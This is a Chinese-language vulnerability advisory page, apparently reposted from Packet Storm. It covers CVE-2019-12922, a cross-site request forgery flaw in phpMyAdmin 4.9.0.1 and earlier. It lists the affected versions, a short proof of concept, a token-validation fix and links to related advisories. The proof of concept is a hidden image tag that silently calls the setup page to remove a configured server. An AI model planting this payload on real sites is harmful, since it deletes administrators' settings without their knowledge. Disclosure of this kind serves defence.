CVE-2019-12922:零日phpMyAdmin跨站点请求伪造漏洞警报
2019-09-15 00:00
1751 查看
phpMyAdmin是一个用PHP编写的免费软件工具,用于处理MySQL或MariaDB数据库服务器的管理。 您可以使用phpMyAdmin执行大多数管理任务,包括创建数据库,运行查询和添加用户帐户。
已在phpMyAdmin中检测到跨站请求伪造,允许攻击者针对删除设置页面中任何服务器的phpMyAdmin用户触发CSRF攻击。 攻击者可以轻松创建包含想要代表用户执行的请求的假超链接,这样就可以避免由于错误使用HTTP方法而导致的CSRF攻击。
CVE-2019-12922: phpMyAdmin 4.9.0.1 – 跨站请求伪造
受影响的版本
- phpMyAdmin <= 4.9.0.1
Poc
Exploit CSRF – Deleting main server
<p>Deleting Server 1</p>
<img src=”
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1″
style=”display:none;” />
解决方法
在每次调用中实现令牌变量的验证,就像在其他phpMyAdmin请求中已经完成的那样。
Via: packetstormsecurity
相关文章推荐
- CVE-2019-11581:JIRA服务器模板注入漏洞警报
- CVE-2019-13272:Linux内核权限提升漏洞警报
- CVE-2019-14234:Django JSONField/HstoreField SQL注入漏洞警报
- CVE-2019-14422:TortoiseSVN远程执行代码漏洞警报
- CVE-2019-3398 - Confluence路径遍历漏洞警报
- CVE-2019-1867:Cisco Elastic Services Controller REST API 身份验证绕过漏洞警报
- 跨站点请求伪造 跨站点脚本编制 通过框架钓鱼漏洞
- CVE-2019-5475:Nexus Repository Manager 2 - 操作系统命令注入漏洞警报
- WordPress Xhanch - My Twitter插件跨站请求伪造漏洞(CVE-2013-3253)
- CVE-2019-9193,PostgreSQL任意代码执行漏洞警报
- Apache Roller服务器侧请求伪造和文件枚举漏洞(CVE-2018-17198)
- CVE-2019-0199,Apache Tomcat DoS漏洞警报
- CVE-2019-5736: runc容器逃逸漏洞警报
- CVE-2019-14378:QEMU虚拟机转义漏洞警报
- CVE-2019-6342:Drupal访问绕过漏洞警报
- CVE-2019-1710 - Cisco IOS XR 64位软件关键安全漏洞警报
- CVE-2019-13615:VideoLAN VLC代码执行漏洞警报
- WordPress Digg Digg插件跨站请求伪造漏洞
- 跨站点请求伪造(CSRF、XSRF)
- WordPress Simple Paypal Shopping Cart插件跨站请求伪造漏洞